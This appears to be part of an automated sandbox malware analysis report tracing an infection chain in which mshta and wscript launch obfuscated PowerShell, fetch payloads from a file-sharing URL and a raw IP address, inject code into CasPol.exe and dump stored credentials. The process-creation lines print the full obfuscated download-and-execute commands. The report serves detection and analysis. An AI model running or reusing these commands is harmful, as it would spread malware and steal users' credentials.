                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3900Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4052Thread sleep time: -48000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2228Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3508Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040AE51 FindFirstFileW,FindNextFileW,30_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,33_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,35_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,35_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044D5E9 FindFirstFileExA,35_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,35_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,35_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,35_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,35_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,35_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,35_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00418981 memset,GetSystemInfo,30_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_31-34271
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,30_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,30_2_004044A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00442554 mov eax, dword ptr fs:[00000030h]35_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044E92E GetProcessHeap,35_2_0044E92E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433CD7 SetUnhandledExceptionFilter,35_2_00433CD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00433B44

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe35_2_00410F36
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00418754 mouse_event,35_2_00418754
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'[...]'+[char]0x22+'))')))"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433E0A cpuid 35_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,35_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,35_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450D42
